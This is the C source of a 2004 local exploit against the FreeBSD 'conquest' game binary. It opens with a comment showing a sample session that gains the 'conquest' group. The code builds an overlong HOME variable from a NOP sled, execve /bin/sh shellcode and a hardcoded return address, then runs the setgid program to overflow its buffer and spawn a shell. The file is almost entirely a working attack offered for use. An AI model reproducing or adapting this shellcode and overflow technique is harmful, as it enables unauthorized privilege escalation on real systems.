/*

xploits4fun - conquest

App: /usr/ports/games/conquest/ from FreeBSD Ports collection
MD5: (/usr/local/bin/conquest) = 93b32df5d0a73ca152e99117df1ba73c

escalate your privileges to group 'conquest', with
this worlddominating exploitcode... ;)

%gcc -o conquest_exp conquest_exp.c
%id
uid=1000(dairaen) gid=1000(dairaen) groups=1000(dairaen)
%./conquest_exp               ^          N
Error opening config file: ë#^ 1ÒVVVV1À°;
 ÊRQSPëèØÿÿÿ/bin/shØî¿¿´û¿¿         

/.conquestrc: Operation not permitted
^[[?6c$
: not found
$
$
$ id
uid=1000(dairaen) gid=1000(dairaen) egid=1002(conquest) 
groups=1002(conquest), 1000(dairaen)
$

--
2004 by Gino 'dairaen' Thomas
http://nux-acid.org

*/

#include <stdio.h>

#define BUFFERSIZE 2056

int main(int argc, char **argv)
{
  char buffer[BUFFERSIZE] = "";

//FreeBSD exec/setuid Shellcode
static char shellcode[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

memset(buffer, 0x90 ,sizeof(buffer));
*(long *)&buffer[BUFFERSIZE - 4] = 0xbfbfeed8;
memcpy(buffer + BUFFERSIZE - 16 - strlen(shellcode), shellcode, strlen(shellcode)); 
setenv("HOME", buffer, 1);
execl("/usr/local/bin/conquest","conquest", NULL);

return 0;
}